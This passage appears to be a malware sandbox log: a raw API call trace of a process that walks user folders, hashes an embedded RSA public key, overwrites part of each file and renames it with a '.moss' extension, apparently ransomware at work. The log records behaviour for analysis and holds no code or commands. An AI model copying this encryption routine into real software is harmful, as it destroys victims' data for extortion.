lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.997] PathFindFileNameW (pszPath="") returned="" [0172.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.998] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.999] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0172.999] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f4d0 | out: hHeap=0xcd0000) returned 1 [0172.999] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.999] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.999] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.000] PathFindFileNameW (pszPath="") returned="" [0173.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0173.001] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.001] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0173.001] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0173.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.002] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=581730) returned 1 [0173.002] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.005] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.005] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.007] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25805, lpOverlapped=0x0) returned 1 [0173.009] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.009] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0173.010] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.010] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.010] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.010] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.010] GetLastError () returned 0x0 [0173.011] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.011] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0173.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.011] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.011] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.011] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.011] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.012] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.012] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0173.013] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.moss")) returned 1 [0173.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.013] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0173.014] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0173.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0173.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609fa8 [0173.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0173.015] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0173.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.015] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=185344) returned 1 [0173.015] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.018] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.018] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.020] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.020] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25805, lpOverlapped=0x0) returned 1 [0173.021] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.022] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0173.023] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.023] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.023] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.023] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.023] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0173.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.023] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.023] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.023] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25810) returned 0x3b62d40 [0173.024] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0173.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57b58 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e808 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ba0 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e820 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e850 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e868 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0173.024] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0173.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e850 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e868 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e868 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e850 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e868 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e850 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0173.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0173.025] GetCurrentThreadId () returned 0x324 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b54bb0 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0173.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.026] GetCurrentThreadId () returned 0x324 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.026] 